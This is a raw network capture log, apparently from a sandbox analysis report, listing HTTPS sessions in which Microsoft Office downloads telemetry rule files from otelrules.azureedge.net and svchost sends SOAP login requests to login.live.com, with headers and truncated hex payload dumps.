                                                                                                                                                                                                                                                                                                                                x-ms-request-id: cc843843-db9a-4245-92d1-ebeafac6a7d3
                                                                                                                                                                                                                                                                                                                                PPServer: PPV: 30 H: BL02EPF000278FD V: 0
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:38 GMT
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Length: 1918
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:39 UTC1918INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                115192.168.2.54989213.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:39 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:39 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:39 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 2284
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 20ac8722-c01e-00ad-30e6-27a2b9000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210239Z-17c5cb586f69w69mgazyf263an00000004pg00000000hpzn
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:39 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                116192.168.2.54989313.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:39 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:40 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:39 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 1393
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: f473ee8a-401e-00ac-6cf0-260a97000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210239Z-16849878b786fl7gm2qg4r5y7000000005x00000000058b5
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:40 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                117192.168.2.54989413.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:39 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:40 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:40 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 1356
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: c2e82b32-d01e-005a-2b27-267fd9000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210240Z-r197bdfb6b48v72xb403uy6hns000000067g0000000030b3
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:40 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                118192.168.2.54989513.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:39 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:40 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:40 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 1393
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 353927da-e01e-0003-452b-290fa8000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210240Z-r197bdfb6b4c8q4qvwwy2byzsw00000005vg000000008u7b
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:40 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                119192.168.2.54989813.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:40 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:40 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:40 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 1356
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 2e99a458-901e-0067-29ae-26b5cb000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210240Z-16849878b786lft2mu9uftf3y400000006s000000000quv5
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:40 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                120192.168.2.54989620.190.159.0443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:40 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                                Content-Length: 4775
                                                                                                                                                                                                                                                                                                                                Host: login.live.com
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:40 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:41 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Expires: Mon, 28 Oct 2024 21:01:40 GMT
                                                                                                                                                                                                                                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                x-ms-route-info: C555_BAY
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 51ef4750-4ce1-4278-b18d-af1d6763663d
                                                                                                                                                                                                                                                                                                                                PPServer: PPV: 30 H: PH1PEPF00011E8C V: 0
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:40 GMT
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Length: 11412
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:41 UTC11412INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                121192.168.2.54989720.190.159.0443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:40 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                                Content-Length: 4775
                                                                                                                                                                                                                                                                                                                                Host: login.live.com
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:40 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:41 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Expires: Mon, 28 Oct 2024 21:01:40 GMT
                                                                                                                                                                                                                                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
